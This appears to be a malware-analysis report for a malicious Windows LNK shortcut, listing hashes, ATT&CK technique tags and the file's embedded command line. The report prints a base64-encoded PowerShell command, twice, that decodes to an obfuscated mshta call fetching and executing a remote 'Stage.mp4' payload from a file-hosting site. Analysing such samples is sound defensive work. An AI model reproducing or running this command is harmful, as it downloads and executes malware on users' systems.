Malicious
Malicious

3bf12a065c4bf9abfc4985443bc66915

LNK File
|
MD5: 3bf12a065c4bf9abfc4985443bc66915
|
Size: 3.09 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
3bf12a065c4bf9abfc4985443bc66915
Sha1
27ebd4c4e443da4683a2cb874f7edf67b6293c58
Sha256
de20b5640a5b340f67159be3c996930649bca93745946da26e76ffb3bd8c3fc0
Sha384
7af72d16a7950ed6705cf0473fd3d05136397b9d4cb2aa00fac3191f3019d8087baebdb2f2ed2a4bf238e0faceff6277
Sha512
c9bcbc832292414347ea5668462537f8f85de1197c55e6023ff5f5573a0b085be830e7e1415a2888e81e8b690b2b2037600b6d6d7a7c0067cbde5f7f6f936740
SSDeep
24:8Ayw/BHYVKVWf+/CW9Op19z4PSCvFu6jkyXCIyjH343Hsab/srsysh6FtmVdd792:8y5ayM3CvFu8/XEQVh6FtmVdJ9Aa
TLSH
A851202409F601FAF673CBB997F573F245A6FBE28C2496BC108067420762554E4A3E7A
File Structure
3bf12a065c4bf9abfc4985443bc66915
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
3bf12a065c4bf9abfc4985443bc66915 (3.09 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙